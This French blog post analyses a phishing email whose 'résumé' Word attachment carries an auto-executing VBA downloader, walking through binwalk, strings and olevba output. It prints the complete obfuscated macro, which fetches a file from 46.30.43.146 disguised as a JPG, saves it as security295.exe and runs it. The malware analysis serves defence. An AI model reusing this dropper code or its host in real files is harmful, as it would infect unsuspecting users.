Hier j'ai reçu un mail intéressant d'une certaine Angela, mais en fait non, l'email venait d'un certains darell.... bref une belle merde en vue...
Hello my name is Angela Corey DOC file is my resume
I would appreciate your immediate attention to this matter
Best regards
Angela Corey
I would appreciate your immediate attention to this matter
Best regards
Angela Corey
Notez l'anglais parfait dans le message et il y avait un document word attaché, je ne mettrais pas ce doc a disposition, mais voici sa petite analyse :D
identification
# file Angela_Corey_resume.doc
Angela_Corey_resume.doc: Microsoft Word 2007+
Angela_Corey_resume.doc: Microsoft Word 2007+
C'est donc bien un Document Word, en tout cas ca en a tout l'air... même si l'extension n'est pas correcte, elle devrait être "docx"... mais bon passons...
Jump into the fire
# binwalk Angela_Corey_resume.doc
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 Zip archive data, at least v2.0 to extract, compressed size: 434, uncompressed size: 1696, name: "[Content_Types].xml"
1003 0x3EB Zip archive data, at least v2.0 to extract, compressed size: 243, uncompressed size: 590, name: "_rels/.rels"
1807 0x70F Zip archive data, at least v2.0 to extract, compressed size: 330, uncompressed size: 1208, name: "word/_rels/document.xml.rels"
2459 0x99B Zip archive data, at least v2.0 to extract, compressed size: 1152, uncompressed size: 4115, name: "word/document.xml"
3658 0xE4A Zip archive data, at least v2.0 to extract, compressed size: 192, uncompressed size: 277, name: "word/_rels/vbaProject.bin.rels"
3910 0xF46 Zip archive data, at least v2.0 to extract, compressed size: 7409, uncompressed size: 16384, name: "word/vbaProject.bin"
11368 0x2C68 Zip archive data, at least v2.0 to extract, compressed size: 1686, uncompressed size: 6992, name: "word/theme/theme1.xml"
13105 0x3331 Zip archive data, at least v2.0 to extract, compressed size: 518, uncompressed size: 1692, name: "word/vbaData.xml"
13669 0x3565 Zip archive data, at least v2.0 to extract, compressed size: 2418, uncompressed size: 8258, name: "word/settings.xml"
16134 0x3F06 Zip archive data, at least v2.0 to extract, compressed size: 374, uncompressed size: 831, name: "word/webSettings.xml"
16558 0x40AE Zip archive data, at least v2.0 to extract, compressed size: 2257, uncompressed size: 17478, name: "word/styles.xml"
18860 0x49AC Zip archive data, at least v2.0 to extract, compressed size: 897, uncompressed size: 4356, name: "word/numbering.xml"
19805 0x4D5D Zip archive data, at least v2.0 to extract, compressed size: 482, uncompressed size: 989, name: "docProps/app.xml"
20597 0x5075 Zip archive data, at least v2.0 to extract, compressed size: 1985, uncompressed size: 15713, name: "word/stylesWithEffects.xml"
22638 0x586E Zip archive data, at least v2.0 to extract, compressed size: 468, uncompressed size: 1062, name: "word/fontTable.xml"
23154 0x5A72 Zip archive data, at least v2.0 to extract, compressed size: 383, uncompressed size: 736, name: "docProps/core.xml"
24892 0x613C End of Zip archive
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 Zip archive data, at least v2.0 to extract, compressed size: 434, uncompressed size: 1696, name: "[Content_Types].xml"
1003 0x3EB Zip archive data, at least v2.0 to extract, compressed size: 243, uncompressed size: 590, name: "_rels/.rels"
1807 0x70F Zip archive data, at least v2.0 to extract, compressed size: 330, uncompressed size: 1208, name: "word/_rels/document.xml.rels"
2459 0x99B Zip archive data, at least v2.0 to extract, compressed size: 1152, uncompressed size: 4115, name: "word/document.xml"
3658 0xE4A Zip archive data, at least v2.0 to extract, compressed size: 192, uncompressed size: 277, name: "word/_rels/vbaProject.bin.rels"
3910 0xF46 Zip archive data, at least v2.0 to extract, compressed size: 7409, uncompressed size: 16384, name: "word/vbaProject.bin"
11368 0x2C68 Zip archive data, at least v2.0 to extract, compressed size: 1686, uncompressed size: 6992, name: "word/theme/theme1.xml"
13105 0x3331 Zip archive data, at least v2.0 to extract, compressed size: 518, uncompressed size: 1692, name: "word/vbaData.xml"
13669 0x3565 Zip archive data, at least v2.0 to extract, compressed size: 2418, uncompressed size: 8258, name: "word/settings.xml"
16134 0x3F06 Zip archive data, at least v2.0 to extract, compressed size: 374, uncompressed size: 831, name: "word/webSettings.xml"
16558 0x40AE Zip archive data, at least v2.0 to extract, compressed size: 2257, uncompressed size: 17478, name: "word/styles.xml"
18860 0x49AC Zip archive data, at least v2.0 to extract, compressed size: 897, uncompressed size: 4356, name: "word/numbering.xml"
19805 0x4D5D Zip archive data, at least v2.0 to extract, compressed size: 482, uncompressed size: 989, name: "docProps/app.xml"
20597 0x5075 Zip archive data, at least v2.0 to extract, compressed size: 1985, uncompressed size: 15713, name: "word/stylesWithEffects.xml"
22638 0x586E Zip archive data, at least v2.0 to extract, compressed size: 468, uncompressed size: 1062, name: "word/fontTable.xml"
23154 0x5A72 Zip archive data, at least v2.0 to extract, compressed size: 383, uncompressed size: 736, name: "docProps/core.xml"
24892 0x613C End of Zip archive
Ca resemble aussi à un word... direction la sandbox
Okaiiii, bien sur un document word a besoin de se connecter a internet, logique quoi...
Virus total ne connait pas ... pour l'instant, mais ce matin (jeudi) plus de 50% des antivirus reconnaissent mon coco...
Deep Dive into the fire
extrayons donc les macros...
# strings vbaProject.bin
B.Recor
mBin
mBina
ADODB.Records
Binar
mBina
WScript.Shel
PDATA
\Firewall
Scripting.FileS
ystemObjec
Scripting.F
ileSystemObje
security295
.exe
Scripti
ileSystemObj
WinHttp.WinHttpRequest.5
http
//46.30.43.146/888.jp
nkiOaWsg$
WScrip
control.exe
day we
ve g
:
:
:
,PxUS
niDcTOFg
20`cQ,u
+O+;
o*c*l
)]'A
BWRTXlXH
Arra
y("WScri
pt.Shel
YXnLT
Join(A
, "")
StfEUfoo
MBoi
andEnvir
ngs ("%AP
:
:
:
ugFEbV
hVBtNfWu
"secur
ity295"
".exe
pPFsD
d&0[
Special
tFpBXEt
gT`mhzpN0
inHttp.t
Request.
+ ".
LehfDp
//46.30.43.146/ 888.jp
Bt "GET
senvd
Deleteya
tatus
iKXMJNLi
LqoaK
pC`eCWYp1;
eBod
:
:
:
blpPFsD
GetSpecialFolderQ\0
tFpBXEt,g0
gTmhzpN
LehfDp
send
FileExists
DeleteFileO
Status
iKXMJNLiLqoaK
CreateTextFile
eCWYpi?T0
responseBodyT
qvkdmDcQBJU
ctLSWfsRxD/
Run_
AutoOpen
dEHZWkPjPiJea`
Workbook_Open
Project
rstd
ole>
\G{00020
430-
0046}#
2.0#0#C:
\WINDOWS
\system3
e2.tlb
#OLE Aut
omation
ENormal
*,\C
!Offic
!G{2DF
8D0
:
:
:
B.Recor
mBin
mBina
ADODB.Records
Binar
mBina
WScript.Shel
PDATA
\Firewall
Scripting.FileS
ystemObjec
Scripting.F
ileSystemObje
security295
.exe
Scripti
ileSystemObj
WinHttp.WinHttpRequest.5
http
//46.30.43.146/888.jp
nkiOaWsg$
WScrip
control.exe
day we
ve g
:
:
:
,PxUS
niDcTOFg
20`cQ,u
+O+;
o*c*l
)]'A
BWRTXlXH
Arra
y("WScri
pt.Shel
YXnLT
Join(A
, "")
StfEUfoo
MBoi
andEnvir
ngs ("%AP
:
:
:
ugFEbV
hVBtNfWu
"secur
ity295"
".exe
pPFsD
d&0[
Special
tFpBXEt
gT`mhzpN0
inHttp.t
Request.
+ ".
LehfDp
//46.30.43.146/ 888.jp
Bt "GET
senvd
Deleteya
tatus
iKXMJNLi
LqoaK
pC`eCWYp1;
eBod
:
:
:
blpPFsD
GetSpecialFolderQ\0
tFpBXEt,g0
gTmhzpN
LehfDp
send
FileExists
DeleteFileO
Status
iKXMJNLiLqoaK
CreateTextFile
eCWYpi?T0
responseBodyT
qvkdmDcQBJU
ctLSWfsRxD/
Run_
AutoOpen
dEHZWkPjPiJea`
Workbook_Open
Project
rstd
ole>
\G{00020
430-
0046}#
2.0#0#C:
\WINDOWS
\system3
e2.tlb
#OLE Aut
omation
ENormal
*,\C
!Offic
!G{2DF
8D0
:
:
:
En gras les trucs qui ne devrait (en temps normal) pas être dans ce document... en vrac :
WScript.Shell
WinHttpRequest
http 46.30.43.146/888.jpg
WinHttpRequest
http 46.30.43.146/888.jpg
Ce genre de choses ne devraient pas se trouver là, voyons cette macro, j'ai éliminé une grosse partie, mai je garde les plus facile à lire....
olevba 0.31 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASI-B-V vbaProject.bin
(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
===============================================================================
FILE: vbaProject.bin
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Auto_Open()
EjhWlOe
End Sub
Function IiDfjVyT(IGjPXjONaLDNw)
Dim SmRbpvFTCs, NPeoYdbIGjPXjONaLDNw, ojHYpQbvLzIWHtz
Const gpfgLnG = 205
Set SmRbpvFTCs = CreateObject("ADO" + "D" + "B.Recor" + "ds" + "e" + "t")
NPeoYdbIGjPXjONaLDNw = LenB(IGjPXjONaLDNw)
If NPeoYdbIGjPXjONaLDNw > 0 Then
SmRbpvFTCs.Fields.Append "mBin" + "ar" + "y", gpfgLnG, NPeoYdbIGjPXjONaLDNw
SmRbpvFTCs.Open
SmRbpvFTCs.AddNew
SmRbpvFTCs("mBi" + "nar" + "y").AppendChunk IGjPXjONaLDNw & ChrB(0)
SmRbpvFTCs.Update
ojHYpQbvLzIWHtz = SmRbpvFTCs("mBina" + "r" + "y").GetChunk(NPeoYdbIGjPXjONaLDNw)
End If
IiDfjVyT = ojHYpQbvLzIWHtz
End Function
Function ynMGeHODmDvo(cwtHLWqOdiD)
Dim pDdoTTOVXudoMzr
If VarType(cwtHLWqOdiD) = 8 Then pDdoTTOVXudoMzr = IiDfjVyT(cwtHLWqOdiD) Else pDdoTTOVXudoMzr = cwtHLWqOdiD
Dim hoflIHaJ, wxluhIIMMnelbk
Const PxUSniDcTOFg = 201
Set hoflIHaJ = CreateObject("ADODB.Records" + "e" + "t")
wxluhIIMMnelbk = LenB(pDdoTTOVXudoMzr)
If wxluhIIMMnelbk > 0 Then
hoflIHaJ.Fields.Append "m" + "Binar" + "y", PxUSniDcTOFg, wxluhIIMMnelbk
hoflIHaJ.Open
hoflIHaJ.AddNew
hoflIHaJ("mB" + "i" + "nar" + "y").AppendChunk pDdoTTOVXudoMzr
hoflIHaJ.Update
ynMGeHODmDvo = hoflIHaJ("mBina" + "r" + "y")
Else
ynMGeHODmDvo = ""
End If
End Function
Sub EjhWlOe()
BWRTXlXHlVI = Array("WScript.Shel" + "l")
Set YXnLTb = CreateObject(Join(BWRTXlXHlVI, ""))
TStfEUfooMBoi = YXnLTb.ExpandEnvironmentStrings("%AP" + "PDATA" + "%")
Dim dzOvcPyK: dzOvcPyK = TStfEUfooMBoi & "\Firewall"
srBDSCleUrzi = Array("Scripting.FileS" + "ystemObjec" + "t")
Set GmHhPUWOqk = CreateObject(Join(srBDSCleUrzi, ""))
If (GmHhPUWOqk.FolderExists(dzOvcPyK)) Then
Else
JMHJPbq = Array("Scripting.F" + "ileSystemObje" + "c" + "t")
Set QzHObsnczpjfE = CreateObject(Join(JMHJPbq, ""))
QzHObsnczpjfE.CreateFolder dzOvcPyK
End If
gFEbVhVBtNfWuh = "security295" & ".exe"
BWRTXlXHlVI = Array("Scripti" + "ng." + "F" + "ileSystemObj" + "ec" + "t")
Set YXnLTb = CreateObject(Join(BWRTXlXHlVI, ""))
blpPFsD = YXnLTb.GetSpecialFolder(2) & "\" + "\"
tFpBXEt = blpPFsD & gFEbVhVBtNfWuh
gTmhzpN = Array("WinHttp.WinHttpRequest.5" + "." + "1")
Set LehfDp = CreateObject(Join(gTmhzpN, ""))
wYSmDVqegs = "http" + ":" + "//46.30.43.146/888.jp" + "g"
LehfDp.Open "GET", wYSmDVqegs, False
LehfDp.send
If YXnLTb.FileExists(tFpBXEt) Then
YXnLTb.DeleteFile (tFpBXEt)
End If
If LehfDp.Status = 200 Then
Set iKXMJNLiLqoaK = YXnLTb.CreateTextFile(tFpBXEt, True)
eCWYpi = LehfDp.responseBody
iKXMJNLiLqoaK.Write bMteCzUXNAP(eFguALjroUX(eCWYpi), "nkiOaWsg")
iKXMJNLiLqoaK.Close
End If
If YXnLTb.FileExists(tFpBXEt) Then
qvkdmDcQBJU = tFpBXEt
ctLSWfsRxD = Array("WScrip" + "t.S" + "he" + "l" + "l")
CreateObject(Join(ctLSWfsRxD, "")).Run qvkdmDcQBJU
CreateObject(Join(ctLSWfsRxD, "")).Run "control.exe " & qvkdmDcQBJU
End If
End Sub
Sub AutoOpen()
dEHZWkPjPiJea = "To" + "day we " + "ha" + "ve g" + "ood ne" + "w" + "s"
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Flags Filename
----------- -----------------------------------------------------------------
OLE:MASI-B-V vbaProject.bin
(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
===============================================================================
FILE: vbaProject.bin
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Auto_Open()
EjhWlOe
End Sub
Function IiDfjVyT(IGjPXjONaLDNw)
Dim SmRbpvFTCs, NPeoYdbIGjPXjONaLDNw, ojHYpQbvLzIWHtz
Const gpfgLnG = 205
Set SmRbpvFTCs = CreateObject("ADO" + "D" + "B.Recor" + "ds" + "e" + "t")
NPeoYdbIGjPXjONaLDNw = LenB(IGjPXjONaLDNw)
If NPeoYdbIGjPXjONaLDNw > 0 Then
SmRbpvFTCs.Fields.Append "mBin" + "ar" + "y", gpfgLnG, NPeoYdbIGjPXjONaLDNw
SmRbpvFTCs.Open
SmRbpvFTCs.AddNew
SmRbpvFTCs("mBi" + "nar" + "y").AppendChunk IGjPXjONaLDNw & ChrB(0)
SmRbpvFTCs.Update
ojHYpQbvLzIWHtz = SmRbpvFTCs("mBina" + "r" + "y").GetChunk(NPeoYdbIGjPXjONaLDNw)
End If
IiDfjVyT = ojHYpQbvLzIWHtz
End Function
Function ynMGeHODmDvo(cwtHLWqOdiD)
Dim pDdoTTOVXudoMzr
If VarType(cwtHLWqOdiD) = 8 Then pDdoTTOVXudoMzr = IiDfjVyT(cwtHLWqOdiD) Else pDdoTTOVXudoMzr = cwtHLWqOdiD
Dim hoflIHaJ, wxluhIIMMnelbk
Const PxUSniDcTOFg = 201
Set hoflIHaJ = CreateObject("ADODB.Records" + "e" + "t")
wxluhIIMMnelbk = LenB(pDdoTTOVXudoMzr)
If wxluhIIMMnelbk > 0 Then
hoflIHaJ.Fields.Append "m" + "Binar" + "y", PxUSniDcTOFg, wxluhIIMMnelbk
hoflIHaJ.Open
hoflIHaJ.AddNew
hoflIHaJ("mB" + "i" + "nar" + "y").AppendChunk pDdoTTOVXudoMzr
hoflIHaJ.Update
ynMGeHODmDvo = hoflIHaJ("mBina" + "r" + "y")
Else
ynMGeHODmDvo = ""
End If
End Function
Sub EjhWlOe()
BWRTXlXHlVI = Array("WScript.Shel" + "l")
Set YXnLTb = CreateObject(Join(BWRTXlXHlVI, ""))
TStfEUfooMBoi = YXnLTb.ExpandEnvironmentStrings("%AP" + "PDATA" + "%")
Dim dzOvcPyK: dzOvcPyK = TStfEUfooMBoi & "\Firewall"
srBDSCleUrzi = Array("Scripting.FileS" + "ystemObjec" + "t")
Set GmHhPUWOqk = CreateObject(Join(srBDSCleUrzi, ""))
If (GmHhPUWOqk.FolderExists(dzOvcPyK)) Then
Else
JMHJPbq = Array("Scripting.F" + "ileSystemObje" + "c" + "t")
Set QzHObsnczpjfE = CreateObject(Join(JMHJPbq, ""))
QzHObsnczpjfE.CreateFolder dzOvcPyK
End If
gFEbVhVBtNfWuh = "security295" & ".exe"
BWRTXlXHlVI = Array("Scripti" + "ng." + "F" + "ileSystemObj" + "ec" + "t")
Set YXnLTb = CreateObject(Join(BWRTXlXHlVI, ""))
blpPFsD = YXnLTb.GetSpecialFolder(2) & "\" + "\"
tFpBXEt = blpPFsD & gFEbVhVBtNfWuh
gTmhzpN = Array("WinHttp.WinHttpRequest.5" + "." + "1")
Set LehfDp = CreateObject(Join(gTmhzpN, ""))
wYSmDVqegs = "http" + ":" + "//46.30.43.146/888.jp" + "g"
LehfDp.Open "GET", wYSmDVqegs, False
LehfDp.send
If YXnLTb.FileExists(tFpBXEt) Then
YXnLTb.DeleteFile (tFpBXEt)
End If
If LehfDp.Status = 200 Then
Set iKXMJNLiLqoaK = YXnLTb.CreateTextFile(tFpBXEt, True)
eCWYpi = LehfDp.responseBody
iKXMJNLiLqoaK.Write bMteCzUXNAP(eFguALjroUX(eCWYpi), "nkiOaWsg")
iKXMJNLiLqoaK.Close
End If
If YXnLTb.FileExists(tFpBXEt) Then
qvkdmDcQBJU = tFpBXEt
ctLSWfsRxD = Array("WScrip" + "t.S" + "he" + "l" + "l")
CreateObject(Join(ctLSWfsRxD, "")).Run qvkdmDcQBJU
CreateObject(Join(ctLSWfsRxD, "")).Run "control.exe " & qvkdmDcQBJU
End If
End Sub
Sub AutoOpen()
dEHZWkPjPiJea = "To" + "day we " + "ha" + "ve g" + "ood ne" + "w" + "s"
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
en en cerise, voici ce que donne olevba.py comme final:
+------------+----------------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------------+-----------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
| AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
| AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
| Suspicious | Open | May open a file |
| Suspicious | Run | May run an executable file or a system |
| | | command |
| Suspicious | CreateObject | May create an OLE object |
| Suspicious | Chr | May attempt to obfuscate specific |
| | | strings |
| Suspicious | ChrB | May attempt to obfuscate specific |
| | | strings |
| Suspicious | Xor | May attempt to obfuscate specific |
| | | strings |
| Suspicious | CreateTextFile | May create a text file |
| Suspicious | Write | May write to a file (if combined with |
| | | Open) |
| Suspicious | Shell | May run an executable file or a system |
| | | command (obfuscation: VBA expression) |
| Suspicious | WScript.Shell | May run an executable file or a system |
| | | command (obfuscation: VBA expression) |
| Suspicious | Base64 Strings | Base64-encoded strings were detected, |
| | | may be used to obfuscate strings |
| | | (option --decode to see all) |
| Suspicious | VBA obfuscated | VBA string expressions were detected, |
| | Strings | may be used to obfuscate strings |
| | | (option --decode to see all) |
| IOC | 46.30.43.146 | IPv4 address |
| IOC | control.exe | Executable file name |
| IOC | hxxp://46.30.43.146/ | URL (obfuscation: VBA expression) |
| | 888.jpg | |
| IOC | 46.30.43.146 | IPv4 address (obfuscation: VBA |
| | | expression) |
| IOC | security295.exe | Executable file name (obfuscation: VBA |
| | | expression) |
+------------+----------------------+-----------------------------------------+
Bref un downloader....
End Game...
En gros cette merde
- concatène son url cible (localisée en russie) et y telecharge soit disant un jpg... (j'ai pas téléchargé la merde, car la "mère patrie" est en zone rouge sur nos firewalls... :D)
- Ecrit le contenu de ce jpg dans un fichier...
- vérifie qu'il n'existe pas dans les temporaires de l'utilsateur un fichier 'security295.exe', dans l'affirmative, remplace le contenu par le jpg
- Execute le fichier fraichement installé... y compris via le control panel...
